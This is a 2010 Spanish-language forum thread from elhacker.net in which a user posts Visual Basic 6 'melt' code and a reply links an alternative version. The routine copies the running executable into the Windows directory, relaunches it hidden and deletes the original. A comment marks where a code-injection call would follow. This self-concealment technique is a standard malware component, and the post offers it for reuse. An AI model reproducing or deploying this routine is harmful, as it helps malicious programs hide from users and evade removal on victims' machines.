elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Melt
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Melt  (Leído 1,659 veces)
fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Melt
« en: 6 Agosto 2010, 18:54 pm »

Bueno, hace un tiempo, vi el melt que hizo MadAntrax y me inspire a hacer el mio, aqui os lo dejo:

Código
  1. ' Melt  By Drinky94.
  2.  
  3. Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  4.  
  5. Public Function DrinkyMelt(Datos As String) As Boolean
  6.    If App.Path = Environ("windir") Then
  7.        Kill Datos
  8.        ' Llegados a este punto ya hemos temrinado el melt y tenemos que llamar a la funcion normal para que siga la ejecucion ejemplo:
  9.        ' Call Inyectar
  10.    Else
  11.        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("Windir") & "\Melt.exe"
  12.        Call ShellExecute(0, "Open", Environ("Windir") & "\Melt.exe", App.Path & "\" & App.EXEName & ".exe", vbNullString, 0)
  13.        End
  14.    End If
  15. End Function
  16.  
  17. Private Sub form_load()
  18.    Call DrinkyMelt(Command)
  19. End Sub

salu2!


« Última modificación: 6 Agosto 2010, 19:12 pm por Drinky94 » En línea

Un byte a la izquierda.
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Melt
« Respuesta #1 en: 6 Agosto 2010, 20:36 pm »


xD, este me gusta mas!¡.

Código
  1.  
  2. http://www.advancevb.com.ar/?p=207
  3.  
  4.  

Dulces Lunas!¡.


En línea

The Dark Shadow is my passion.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Pregunta 'basica'] Que es Melt?
Análisis y Diseño de Malware
CAR3S? 3 3,402 Último mensaje 15 Abril 2011, 22:34 pm
por CAR3S?
[FUNCION] Autoit MELT
Scripting
79137913 0 1,856 Último mensaje 10 Diciembre 2013, 14:57 pm
por 79137913
[VBS]Perfect Melt
Scripting
xXSCORPIOXx 7 3,654 Último mensaje 21 Marzo 2014, 01:58 am
por 79137913
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines